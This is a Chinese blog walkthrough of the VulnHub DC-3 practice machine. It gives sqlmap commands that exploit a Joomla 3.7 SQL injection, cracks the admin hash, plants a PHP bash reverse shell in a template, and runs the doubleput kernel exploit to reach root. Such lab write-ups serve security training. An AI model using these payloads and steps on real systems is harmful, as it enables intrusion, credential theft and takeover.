vulnhub DC-3

最新推荐文章于 2024-08-02 16:59:58 发布
最新推荐文章于 2024-08-02 16:59:58 发布
阅读量1.5k 收藏 17
点赞数 25
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48318463/article/details/139008197
版权

kali ip:192.168.182.129

先netdiscover扫描找到ip192.168.182.130

nmap扫描,80开放

登录网页

dirsearch扫描一下,能看到几个必要的页面,都进去访问把

remade.txt里面有cms信息 3.7版本的joomla框架,administartor是登录页面

去根据cms查查漏洞 是个sql注入漏洞(msf里的search也可以找,但好像找不到)

这个searchsploit是个搜索漏洞的工具(详情度娘)

使用 searchploit -p +后面的路径   可以展开详细内容 (显示漏洞利用的完整路径,如果可能还将路径复制到剪贴板,后面跟漏洞ID号) 括号内是官方原文翻译

其中url可以访问 进去后会有更加详细的漏洞内容

那就访问url

看! 让使用sqlmap,下面还给格式了。直接使用(注意修改ip)

它给的是第一步的sqlmap命令 爆库,有5个 看框架名字基本就是joomladb了

爆表(tables) 跟它给的基本相同,需要修改后面部分

sqlmap -u "http://192.168.182.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables  -p list[fullordering]

也就是users了 接着爆列(colunmns)

sqlmap -u "http://192.168.182.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]

有6列 咱们只想知道name与password 爆字段

sqlmap  -u "http://192.168.182.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]

得到一串经过加密的

使用工具john ,将这段加密后的password找个.txt保存放在桌面

命令 john +路径 (直接拖拽进来就好了)

得到密码snoopy

用户名admin 密码 snoopy 登录

如果已经爆破过一次了 第二次需要使用其他命令

john -- show 文件

登录之前爆破目录中的登录页面,选择Beez3 Details and Files

点击php旁的Create进入编辑 目录位置是html

写入 <?php
system("bash -c 'bash -i >& /dev/tcp/192.168.182.133/8888 0>&1'");

这句代码是用来反弹shell用的 其中ip为自己kali的ip,端口号是监听开放选择的端口,任意

访问路径在左上角,templates/beez3/html

1.保存并退出

2.回到kali开启监听

3.访问上传文件

这就是反弹shell,通过脚本或代码,之后访问,将内容返回给kali达到得到shell

开监听 端口设置代码里的8888

再开启监听后,点击config3.php

得到shell

得到shell之后就提权

其实直接访问ip的时候会弹出页面,输入admin与snooy会得到提示,就说让提权而且只有一个flag

sudo -l,没有

find,看一圈也没有啥能提权的(这个凭个人经验,假如出现find就能用find -文件名 -exec来提权)

查看内核版本:uname -a
查看系统发行版本:cat /etc/*-release

查查这两个共同漏洞

选择这个两个原因

1.linux4.4 Ubuntu 16.04

2.Privilege Escalation的意思就是提权

searchsploit -p +路径 显示完整路径,再访问url

这个url可以好好看看,里面记载挺多东西 这个就是利用下面给的exp去提权

使用方法

下载exp路径(第二个),利用exp

咱们就直接再靶机中下载 wget url

解压 unzip 39772.zip

cd 到39772

里面有exploit.tar (.tar也是压缩文件)

tar -xvf 文件名

ls

看手册进入到目录中

cd 解压出来的文件

进入到</ tempates/.........>

ls

按照手册走输入 ./compile.sh

再次ls看到生成doubleput

输入 ./doubleput

出现now 根据手册看的

id 为root

cd /root

ls 发现flag.txt 

cat

总结:

注意手册内容

提权靠经验

好好学英文

无敌超人不会飞
关注
  • 25
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub DC-3
柠檬木有枝
07-14 1138
访问服务,发现是 joomla 服务,使用 joomlacan 扫描 joomlascan -u 192.168.6.129 3.7.0 版本,存在 SQl 注入漏洞(CVE-2017-8917) github 下载 exp 然后运行,获取到用户名密码 hash 使用 hashcat 破解 hash,破解密码得 snoopy 登录到后台 发现提示,需要获取到 root 权限 编辑模版,修改...
vulnhub DC-3 靶机渗透测试
小松博客
05-21 171
我们使用账号admin,密码snoopy登陆到后台,再次回到msf中的利用脚本,输入run运行脚本。找到了不少漏洞可用,但就这个漏洞好使:CVE-2016-4557。得到一个漏洞利用脚本下载链接,我们把他down下来,然后解压。然后等待一下,输入ls查看目录内容,发现多了几个可执行文件。已经是root,直接cd到 /root目录,ls查看文件。拿到shell以后,我们上传漏洞检测脚本,寻找提权漏洞。等待几秒钟,然后输入whoami查看自己的权限。发现两个,可以尝试使用这个sql注入漏洞,
Vulnhub DC-3靶机渗透攻击过程演练
zhongxj183的博客
03-26 3193
Vulnhub DC-3靶机渗透攻击过程演练 DC-3介绍 DC-3靶机只有1个flag,一个入口点,根本没有任何线索。 环境准备 下载DC-3靶机导入VMware,选择和Kali同一网络适配器,DHCP获取IP即可 渗透过程 信息收集 首先扫描存活主机,得到目标靶机的IP nmap -sP 192.168.64.0/24 全端口扫描 nmap -T4 -sC -sV -p1-65535 192.168.64.157 仅开放了80端口,一个用 Joomla! 搭建的网站。Joomla! 是一套全球
Vulnhub靶场----3、DC-3.2
七天
03-14 563
1 、只开放80端口的情况下,网站指纹、目录扫描等方向 2 、通过网站CMS版本信息搜索相关版本漏洞 3 、利用版本SQL注入漏洞获取后台登录账号密码 4 、后台寻找webshell插入地址 5 、获取shell,寻找服务器版本漏洞 6 、利用服务器版本漏洞提权。
vulnhub DC-3靶机实战
m0_51195235的博客
10-04 271
vulnhub DC-3靶机实战
Vulnhub DC-3靶机渗透测试(DC系列)
Alexhirchi的博客
10-11 923
每日学习~ 冲冲冲 VulnHub 入门DC系列之DC-1 说明 靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/ 渗透靶场:VirtualBox 攻击靶机:本地机+kail(VMware) Flag:5个 启动DC-1靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机 ...
Vulnhub DC-3靶机思路分析
Sum
03-26 177
DC-3(入门) 关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-3: 下载地址: https : //download.vulnhub.com/dc/DC-3.zip 环境: Vmware 15 Pro虚拟机软件 DC-3靶机IP地址:192.168.233.140 Kali的IP地址:192.168.233.134 主机渗透系统: kali2020 安装好虚拟机后挂载Vmware运行 局域网内主机发现 扫描局域网所有设备(所有
VulnHub DC-3
GDL1411983801的博客
12-31 1007
DC-3虚拟机文件夹压缩包链接:https://pan.baidu.com/s/1kZ9RNflZSmV4Vr2UmyMA1g提取码:d9cz–来自百度网盘超级会员V6的分享1.若出现报错提醒:2.选择编辑虚拟机设置后,移除CD/DVD3.修改网卡为NAT模式4.成功进入DC-3。
Vulnhub - DC-1
qq_46081990的博客
03-14 376
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 478
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 444
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 219
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
访问网站显示不安全怎么办?
joySSL_的博客
08-02 431
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值